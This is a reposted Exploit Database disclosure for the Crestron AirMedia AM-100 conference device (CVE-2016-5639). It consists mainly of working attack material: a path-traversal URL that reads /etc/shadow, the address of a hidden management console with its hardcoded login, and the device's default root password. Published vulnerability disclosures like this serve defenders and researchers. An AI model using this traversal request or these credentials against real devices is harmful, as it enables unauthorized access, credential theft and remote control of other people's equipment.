Crestron AM-100 – Multiple Vulnerabilities

• Exploit Database
• 17 阅读

• 作者： Zach Lanier
  日期： 2016-11-22
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/40813/

• =================================================================
  # Crestron AM-100 (Multiple Vulnerabilities)
  =================================================================
  # Date: 2016-08-01
  # Exploit Author: Zach Lanier
  # Vendor Homepage: https://www.crestron.com/products/model/am-100
  # Version: v1.1.1.11 - v1.2.1
  # CVE: CVE-2016-5639 
  # References: 
  # https://medium.com/@benichmt1/an-unwanted-wireless-guest-9433383b1673#.78tu9divi
  # https://github.com/CylanceVulnResearch/disclosures/blob/master/CLVA-2016-05-001.md
  
  Description:
  The Crestron AirMedia AM-100 with firmware versions v1.1.1.11 - v1.2.1 is vulnerable to multiple issues.
  
  1) Path Traversal
  
  GET request: 
  http://[AM-100-ADDRESS]/cgi-bin/login.cgi?lang=en&src=../../../../../../../../../../../../../../../../../../../../etc/shadow
  
  2) Hidden Management Console
  
  http://[AM-100-ADDRESS]/cgi-bin/login_rdtool.cgi
  The AM-100 has a hardcoded default credential of rdtool::mistral5885
  This interface contains the ability to upload arbitrary files (RD upload) and can enable a telnet server that runs on port 5885 (RD Debug mode).
  
  3) Hardcoded credentials
  
  The default root password for these devices is root::awind5885
  Valid login sessions for the default (non-debugging) management interface are stored on the filesystem as session01, session02.. etc. Cleartext credentials can be read directly from these files.